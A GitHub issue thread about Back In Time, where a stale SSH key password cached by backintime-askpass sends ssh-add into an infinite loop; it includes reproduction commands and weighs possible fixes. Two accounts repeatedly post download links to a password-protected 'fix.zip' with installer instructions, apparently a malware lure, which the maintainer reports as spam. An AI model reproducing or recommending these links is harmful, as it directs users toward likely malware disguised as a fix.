### ISSUE TITLE
backintime-askpass and ssh-add enter infinite loop when cached SSH key password does not match current password

### ISSUE THREAD

**Issue by daviewales** [bit-team/backintime#1852]
<details>
<summary><code>backintime --diagnostics</code></summary>

``` sh
{
    "backintime": {
        "name": "Back In Time",
        "version": "1.5.3-dev.366ef003",
        "running-as-root": false,
        "latest-config-version": 6,
        "local-config-file": "/home/UsernameReplaced/.config/backintime/config",
        "local-config-file-found": true,
        "global-config-file": "/etc/backintime/config",
        "global-config-file-found": false,
        "started-from": "/usr/share/backintime/common",
        "user-callback": "/home/UsernameReplaced/.config/backintime/user-callback",
        "keyring-supported": true
    },
    "host-setup": {
        "OS": {
            "/etc/os-release": "Linux Mint 22",
            "/etc/lsb-release": "DISTRIB_ID=LinuxMint\nDISTRIB_RELEASE=22\nDISTRIB_CODENAME=wilma\nDISTRIB_DESCRIPTION=\"Linux Mint 22 Wilma\"\n",
            "/etc/debian_version": "trixie/sid\n"
        },
        "platform": "Linux-6.8.0-40-generic-x86_64-with-glibc2.39",
        "system": "Linux #40-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul  5 10:34:03 UTC 2024",
        "display-system": "x11",
        "locale": "en_AU, UTF-8",
        "PATH": "/home/UsernameReplaced/.bun/bin:/home/UsernameReplaced/.cargo/bin:/home/UsernameReplaced/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/home/UsernameReplaced/.local/bin:/home/UsernameReplaced/.local/bin:/home/UsernameReplaced/.cargo/bin",
        "RSYNC_OLD_ARGS": "(not set)",
        "RSYNC_PROTECT_ARGS": "(not set)"
    },
    "python-setup": {
        "python": "3.12.3 main Jul 31 2024 17:43:48 CPython GCC 13.2.0",
        "python-executable": "/usr/bin/python3",
        "python-executable-symlink": true,
        "python-executable-resolved": "/usr/bin/python3.12",
        "sys.path": [
            "/usr/share/backintime/qt/plugins",
            "/usr/share/backintime/common/plugins",
            "/usr/share/backintime/plugins",
            "/usr/share/backintime/common",
            "/usr/lib/python312.zip",
            "/usr/lib/python3.12",
            "/usr/lib/python3.12/lib-dynload",
            "/usr/local/lib/python3.12/dist-packages",
            "/usr/lib/python3/dist-packages",
            "/usr/lib/python3.12/dist-packages"
        ],
        "qt": {
            "Version": "PyQt 6.6.1 / Qt 6.4.2",
            "Theme": "Mint-Y-Sand",
            "Theme Search Paths": [
                "/home/UsernameReplaced/.icons",
                "/home/UsernameReplaced/.local/share/icons",
                "/usr/share/cinnamon/icons",
                "/var/lib/flatpak/exports/share/icons",
                "/usr/share/icons",
                ":/icons"
            ],
            "Fallback Theme": "",
            "Fallback Search Paths": []
        }
    },
    "external-programs": {
        "rsync": {
            "version": "3.2.7",
            "protocol": "31.0",
            "capabilities": "file_bits: 64; inum_bits: 64; timestamp_bits: 64; long_int_bits: 64; socketpairs: True; symlinks: True; symtimes: True; hardlinks: True; hardlink_specials: True; hardlink_symlinks: True; IPv6: True; atimes: True; batchfiles: True; inplace: True; append: True; ACLs: True; xattrs: True; secluded_args: optional; iconv: True; prealloc: True; stop_at: True; crtimes: False",
            "optimizations": "SIMD_roll: True; asm_roll: False; openssl_crypto: True; asm_MD5: False",
            "checksum_list": "xxh128, xxh3, xxh64, md5, md4, sha1, none",
            "compress_list": "zstd, lz4, zlibx, zlib, none",
            "daemon_auth_list": "sha512, sha256, sha1, md5, md4"
        },
        "ssh": "OpenSSH_9.6p1 Ubuntu-3ubuntu13.4, OpenSSL 3.0.13 30 Jan 2024",
        "sshfs": "3.7.3",
        "encfs": "1.9.5",
        "shell": "/bin/bash",
        "shell-version": "GNU bash, version 5.2.21(1)-release (x86_64-pc-linux-gnu)"
    }
}
```

</details>

This bug follows from discussion in https://github.com/bit-team/backintime/pull/1839#issuecomment-2308382426.

In summary, `backintime-askpass` is used (abused?) to cache the SSH key password for password-protected SSH keys.
To reproduce the problem, create a test SSH key and protect it with a password. Then add the key to the `ssh-agent` with `ssh-add` using the commands below, which will use `backintime-askpass` to get the password. Then remove the key from `ssh-agent`, change the key password, and add it to `ssh-agent` again. Instead of prompting you to enter the new password, it will silently provide the old password to `ssh-add`, which will fail, then ask `backintime-askpass` to provide the password again. This continues in a loop indefinitely.

## Reproduce

``` sh
# create test key `id_rsa_test` with password `test`
PASSWORD=testing
KEY=~/.ssh/id_rsa_test
ssh-keygen -t rsa -b 4096 -N "$PASSWORD" -f "$KEY"

# Add the key to ssh-agent, using the `backintime-askpass` tool to get the password
SSH_ASKPASS=backintime-askpass SSH_ASKPASS_REQUIRE=prefer ASKPASS_PROFILE_ID=1 ASKPASS_MODE=ssh ssh-add "$KEY"

# Remove the key from the `ssh-agent`
ssh-add -d "$KEY"

# Change the password
OLD_PASSWORD="$PASSWORD"
PASSWORD=testing2
ssh-keygen -p -P "$OLD_PASSWORD" -N "$PASSWORD" -f "$KEY"

# Add the key to ssh-agent again, using the `backintime-askpass` tool to get the password
SSH_ASKPASS=backintime-askpass SSH_ASKPASS_REQUIRE=prefer ASKPASS_PROFILE_ID=1 ASKPASS_MODE=ssh ssh-add "$KEY"
```

Note: The above assumes that `backintime-askpass` is in a clean state.
If you have already used `backintime-askpass` once, then you will reproduce the issue the first time you run `ssh-add`, and don't need to proceed to the second run. You will know that you have reproduced the issue when `ssh-add` hangs, and starts to use lots of CPU.

## Next steps

- Think about whether it is a good idea to use `backintime-askpass` to cache SSH passwords. Should we instead use the system login keychain to store the password across reboots and the built-in `ssh-agent` caching to store it for the duration of a login session? (I don't know enough about the use-cases to confidently answer this question yet.)
- If we _do_ need to keep `backintime-askpass`, we could tweak it to prevent it entering the infinite loop:
    - A simple solution would be for `backintime-askpass` to quickly check if the cached password can unlock the key, before providing the password to `ssh-add`. This can be done by piping the password to `ssh-keygen -y -f "$KEY"`, and checking the exit status as described in this [SO answer](https://stackoverflow.com/a/23666831/). This is simple enough that it might make sense to just apply this fix, and evaluate the first question later.

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by buhtz** [comment]
I reported the two spam accounts to Microsoft GitHub. Deleting them can take some days. I don't have the permissions to block users to the whole project. So I lock the conversation in this thread temporarily.

EDIT: One of the accounts is deleted.

**Comment by daviewales** [comment]
The 'simple' solution to is to check that the `backintime-askpass`
password is valid before running `ssh-add`. Note that this technically
introduces a race condition, as there will be a small window of time between
when we check that the password is valid and when we try to use it. However,
this is an improvement over the current state in which we don't check at all...

There are many potential ways to do this, including the following:

-   Test unlocking the SSH key directly using something like
    [load_ssh_private_key][] from the [cryptography][] library. (Could also
    try [from_private_key][] from [Paramiko][])  
    Pros: Simple and direct.   
    Cons: cryptography is a sometimes controversial additional
    dependency, as it relies on Rust binaries which restricts the supported
    platforms and architectures to those supported by Rust. Paramiko is still
    an extra dependency.
-   Test unlocking the SSH key with `ssh-keygen -y -f $KEY -P $PASSWORD`  
    Pros: No additional dependencies, simple, easy to implement  
    Cons: Temporarily exposes SSH key password in process tree
-   Test unlocking the SSH key with

    ``` sh
    SSH_ASKPASS=backintime-askpass SSH_ASKPASS_REQUIRE=prefer ssh-keygen -y -f $KEY
    ```

    Unlike `ssh-add`, `ssh-keygen` will not continuously loop if the password
    is incorrect, so you can attempt to unlock the key with
    `backintime-askpass`, then check the return value or `stdout` to see if it
    worked.  
    Pros: No additional dependencies, simple, easy to implement, does not
    expose the password to the process tree.
    Cons: None? Feels hacky?
-   Test unlocking the SSH key by spawning `ssh-keygen -y -f $KEY` with
    [ptyprocess][] or [pexpect][]. This allows us to securely send a password
    to `ssh-keygen` without using askpass or specifying it as an argument.
    (Can't just pipe the password to `stdin`, because `ssh-keygen` reads the
    password directly from the `pty`, not from `stdin`.    
    Pros: Secure, does not expose password to process tree. Does not require
    calling `backintime-askpass`.  
    Cons: Additional dependency, not sure we need to avoid calling
    `backintime-askpass`.

NOTE: All these fixes need to happen in the calling code before we try to run
`ssh-add`. We can't add them to askpass, because askpass does not know which
SSH key the password is for, so cannot check that the cached password works.
Only the calling code knows which key is used.

## Action

I think testing if we can unlock the key with the following is the most
straightforward option:

``` sh
SSH_ASKPASS=backintime-askpass SSH_ASKPASS_REQUIRE=prefer ssh-keygen -y -f $KEY
```

- Find all the code which runs `ssh-add`, and add this check first.
- If the password is good, carry on.
- If the password is bad, trigger `backintime-askpass` to get a fresh password.
  I think there is an environment variable which will instruct
  `backintime-askpass` to fetch a new password without using the cache. (Maybe?)

[load_ssh_private_key]: https://cryptography.io/en/latest/hazmat/primitives/asymmetric/serialization/#cryptography.hazmat.primitives.serialization.load_ssh_private_key
[cryptography]: https://cryptography.io/en/latest/
[ptyprocess]: https://github.com/pexpect/ptyprocess/
[pexpect]: https://github.com/pexpect/pexpect
[from_private_key]: https://docs.paramiko.org/en/2.4/api/keys.html#paramiko.pkey.PKey.from_private_key
[Paramiko]: https://docs.paramiko.org/en/2.4/index.html
